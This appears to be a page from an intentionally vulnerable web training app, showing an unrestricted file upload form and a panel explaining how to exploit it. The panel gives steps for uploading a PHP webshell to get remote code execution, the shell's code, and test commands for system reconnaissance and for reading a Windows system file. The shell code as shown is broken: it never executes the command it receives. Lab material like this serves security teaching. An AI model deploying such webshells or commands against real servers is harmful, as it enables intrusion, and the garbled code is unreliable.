โ† Back to Dashboard

Upload a File

๐Ÿ“ Select a file to upload

No restrictions - upload any file type!

Uploaded Files

No files uploaded yet.

๐ŸŽฏ Vulnerability Info

Type: Unrestricted File Upload

Severity: Critical

๐Ÿ’ก How to Exploit

  • No file type validation
  • PHP files can be uploaded
  • Uploaded files are directly accessible
  • Execute uploaded PHP files for RCE

๐Ÿงช Simple PHP Webshell

Create a file named shell.php:

<?php // Simple command shell if(isset($_GET['cmd'])) { echo '<pre>'; echo '</pre>'; } ?>

๐Ÿ“ Usage

  1. Save the code above as shell.php
  2. Upload the file
  3. Access: /uploads/shell.php?cmd=whoami

๐Ÿ”ง Test Commands

shell.php?cmd=whoami shell.php?cmd=dir shell.php?cmd=ipconfig shell.php?cmd=type C:\Windows\win.ini